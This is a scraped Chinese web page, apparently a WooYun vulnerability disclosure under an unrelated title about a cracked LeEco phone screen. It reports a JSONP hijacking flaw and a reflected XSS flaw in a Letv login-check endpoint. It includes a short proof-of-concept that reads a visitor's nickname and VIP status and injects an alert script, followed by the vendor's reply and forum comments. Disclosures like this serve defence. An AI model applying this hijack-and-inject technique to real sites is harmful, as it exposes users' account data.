乐视1s太子妃版屏幕下面裂开一个洞

分享漏洞:
披露状态:
: 细节已通知厂商并且等待厂商处理中
: 厂商已经确认,细节仅向厂商公开
: 细节向核心白帽子及相关领域专家公开
: 细节向普通白帽子公开
: 细节向实习白帽子公开
: 细节向公众公开
简要描述:
同一个url,可以xss,也可以hijack,为什么你sobug非要把两个不一样的漏洞认定为同一个漏洞呢。那我就发乌云试试
详细说明:
/letv/net/checkLogin.jsp?callback=xxx
这个url存在两处问题
1. 没有限制referer,也没有csrf token,可以js hijck读到来访用户在乐视的信息
2. callback没有任何限制,可以导致反射型xss
漏洞证明:
code 区域&html&
&div id='x' name='x'&&/div&
function xx(obj){
x.innerHTML='亲爱的乐视网网友:'+obj.nickname+'.&br /&通过我们的检测发现,你'+(obj.isvip?'是乐视的VIP会员,好高大上.':'不是乐视
网的会员,好屌丝.')+'&br /&接下来我们要对你发动xss攻击了';
var o=document.createElement('iframe');
o.height=1;
o.width=1;
o.src='/letv/net/checkLogin.jsp?callback=&script&alert(&hello '+obj.nickname+'. This is the alert fr
om: &%2bdocument.domain);&'+'/script&';
document.body.appendChild(o);
&script src='/letv/net/checkLogin.jsp?callback=xx'&
修复方案:
问下sobug的人,他们最专业了
版权声明:转载请注明来源 @
厂商回应:
危害等级:中
漏洞Rank:10
确认时间: 11:33
厂商回复:
好问题,值得大家探讨,先通知修复吧~
最新状态:
漏洞评价:
对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值
漏洞评价(共0人评价):
登陆后才能进行评分
应该是csrf +xss + hijack
咋滴了这是 一堆人跟土豆干上了
登录后才能发表评论,请先}

我要回帖

更多关于 乐视 裂开 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信